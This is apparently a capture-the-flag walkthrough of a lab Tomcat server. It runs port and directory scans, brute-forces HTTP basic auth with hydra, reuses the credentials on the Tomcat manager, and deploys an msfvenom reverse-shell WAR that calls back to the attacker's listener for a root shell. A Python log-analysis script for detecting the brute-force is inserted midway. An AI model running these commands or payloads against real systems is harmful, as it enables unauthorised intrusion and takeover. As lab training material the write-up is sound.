Nmap

First we scan for open ports

# nmap -p- -T4 -sV -sC 10.10.226.164 -oA nmap
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-04 00:13 BST
Nmap scan report for 10.10.226.164
Host is up (0.020s latency).
Not shown: 65531 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 48:5b:b2:62:b5:51:14:a8:7a:34:22:fd:87:e3:08:40 (RSA)
|   256 fe:ff:1b:55:97:fb:58:22:6e:14:4f:80:30:92:0c:f5 (ECDSA)
|_  256 7f:e0:6c:2f:c2:35:e9:d2:14:44:07:9a:83:2f:03:51 (ED25519)
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
1234/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/7.0.88
|_http-favicon: Apache Tomcat
8009/tcp open  ajp13   Apache Jserv (Protocol v1.3)
|_ajp-methods: Failed to get a valid response for the OPTION request
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.62 seconds

Website

Visiting the site on port 80 shows a static page indicating the site is down for maintenance. We run gobuster to see if there is anything else we can reach.

# gobuster dir -u http://10.10.226.164 -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.226.164
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 292]
/.htaccess            (Status: 403) [Size: 297]
/.htpasswd            (Status: 403) [Size: 297]
/guidelines           (Status: 301) [Size: 319] [--> http://10.10.226.164/guidelines/]
/index.html           (Status: 200) [Size: 168]
/protected            (Status: 401) [Size: 460]
/server-status        (Status: 403) [Size: 301]
Progress: 4614 / 4615 (99.98%)
===============================================================
Finished
===============================================================

Visiting the guidelines directory just displays a simple message; however, it does give us a potential username.

Trying the protected directory, we see that it is just protected by HTTP basic authentication, so we use hydra against it with the username we found.

# hydra -l bob -P /usr/share/wordlists/rockyou.txt -f 10.10.226.164 http-get /protected/
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-08-04 00:28:08
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-get://10.10.226.164:80/protected/
[80][http-get] host: 10.10.226.164   login: bob   password: *******
[STATUS] attack finished for 10.10.226.164 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-08-04 00:28:12

We log in with the credentials and the page just shows a message saying “This protected page has now moved to a different port.”
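From the defender's side, the burst of 401 responses that hydra produces against /protected/ is easy to spot in the Apache access log. The script below is an added example and not part of the original write-up; it assumes the Apache combined log format and works on constructed sample lines (the addresses mirror the lab addresses above), reporting which account authenticated successfully right after the burst so that credential can be rotated.

```python
import re
from collections import defaultdict
from datetime import datetime

# Apache "combined" access-log line (assumed format; the write-up shows no server logs)
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)

def parse_line(line):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    e = m.groupdict()
    e["ts"] = datetime.strptime(e["ts"], "%d/%b/%Y:%H:%M:%S %z")
    e["status"] = int(e["status"])
    return e

def detect_basic_auth_bruteforce(lines, threshold=20, window_seconds=60):
    """Flag (ip, path) pairs with at least `threshold` 401s inside `window_seconds`.
    If a 200 with an authenticated user follows the burst, report that user as
    likely compromised so the responder knows which credential to rotate."""
    by_key = defaultdict(list)
    for line in lines:
        e = parse_line(line)
        if e:
            by_key[(e["ip"], e["path"])].append(e)
    findings = []
    for (ip, path), entries in by_key.items():
        entries.sort(key=lambda e: e["ts"])
        fails = [e for e in entries if e["status"] == 401]
        start, peak = 0, 0  # sliding window over the 401 timestamps
        for end in range(len(fails)):
            while (fails[end]["ts"] - fails[start]["ts"]).total_seconds() > window_seconds:
                start += 1
            peak = max(peak, end - start + 1)
        if peak < threshold:
            continue
        last_fail = fails[-1]["ts"]
        hits = [e["user"] for e in entries
                if e["status"] == 200 and e["user"] != "-" and e["ts"] >= last_fail]
        findings.append({"ip": ip, "path": path, "failures": peak,
                         "compromised_user": hits[0] if hits else None})
    return findings

def build_sample_log():
    """Constructed sample: a hydra-style burst of 401s on /protected/, then a 200 as bob."""
    fmt = '{ip} - {user} [04/Aug/2025:00:28:{sec:02d} +0100] "GET {path} HTTP/1.1" {status} 460 "-" "Mozilla/5.0"'
    lines = [fmt.format(ip="10.11.18.78", user="bob", sec=8 + i // 8, path="/protected/", status=401) for i in range(25)]
    lines.append(fmt.format(ip="10.11.18.78", user="bob", sec=12, path="/protected/", status=200))
    lines.append(fmt.format(ip="192.0.2.10", user="-", sec=30, path="/protected/", status=401))  # single typo, benign
    return lines
```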

Tomcat

Visiting the web application on port 1234 we see the standard Apache Tomcat page. From here we click on the manager link and use the same credentials as before on the basic authentication prompt. This grants us access to the manager application.

From here we can deploy a malicious WAR file to get a reverse shell back. We generate it locally with msfvenom and upload it through the manager application.

# msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.11.18.78 LPORT=6666 -f war -o shell.war
Payload size: 1096 bytes
Final size of war file: 1096 bytes
Saved as: shell.war

Then we just start a listener and click on the shell application. We get a reverse shell as root and can simply cat out the flag.

# nc -lvnp 6666
listening on [any] 6666 ...
connect to [10.11.18.78] from (UNKNOWN) [10.10.226.164] 39988

id
uid=0(root) gid=0(root) groups=0(root)
cat /root/flag.txt
ff****************************e1